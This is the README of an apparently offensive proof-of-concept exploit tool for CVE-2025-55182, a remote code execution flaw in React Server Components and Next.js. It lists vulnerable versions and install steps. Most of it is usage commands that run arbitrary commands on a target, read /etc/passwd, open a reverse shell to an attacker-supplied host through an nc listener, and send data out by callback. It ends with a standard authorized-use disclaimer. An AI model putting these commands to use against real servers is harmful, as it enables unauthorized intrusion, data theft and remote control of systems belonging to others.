p3ta00/react2shell-poc

# React2Shell - CVE-2025-55182 PoC Proof of Concept for **CVE-2025-55182**, a critical unauthenticated Remote Code Execution vulnerability in React Server Components. **CVSS Score:** 10.0 (Critical) ## Vulnerability ### Affected Versions | Product | Vulnerable | Patched | |---------|------------|---------| | React | 19.0.0 - 19.2.0 | 19.0.1, 19.1.2, 19.2.1+ | | Next.js | 14.3.0-canary.77 - 16.x | 15.0.5, 15.1.9, 15.2.6, 16.0.7+ | ## Installation git clone https://github.com/p3ta00/react2shell-poc.git cd react2shell-poc pip install requests ## Usage ### Command Execution with Output (Default - Error-Based Exfiltration) Output is returned directly in the HTTP response via NEXT_REDIRECT error - **no callback server needed**. python3 react2shell-poc.py -t http://TARGET:3000 -c "id" python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd" ### Interactive Mode python3 react2shell-poc.py -t http://TARGET:3000 -i ### Check Vulnerability python3 react2shell-poc.py -t http://TARGET:3000 --check ### Blind RCE (No Output) python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind ### Reverse Shell # Start listener nc -lvnp 4444 # Send payload python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444 ### Legacy: Callback-Based Exfiltration python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP ## Options -t, --target Target URL (required) -c, --command Command to execute (output via error-based exfil by default) --check Check if target is vulnerable --blind Blind RCE mode (no output capture) --listen Use callback server instead of error-based exfil -i, --interactive Interactive pseudo-shell mode --revshell Attempt reverse shell --lhost Attacker IP for callbacks/reverse shell --lport Callback port (default: 9999) --callback Manual callback URL --timeout Request timeout in seconds (default: 30) ## How It Works The default exfiltration method uses **NEXT_REDIRECT error injection**: 1. Execute command and capture output 2. Throw a `NEXT_REDIRECT` error with output in `digest` field 3. Next.js serializes the error in the Flight response 4. Output appears directly in HTTP response body This is more reliable than callback-based exfiltration because it doesn't require outbound network access from the target. ## References - [Wiz Security - React2Shell Disclosure](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182) - [Datadog Security Labs Analysis](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/) - [NVD - CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) ## Disclaimer This tool is for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. ## Author p3ta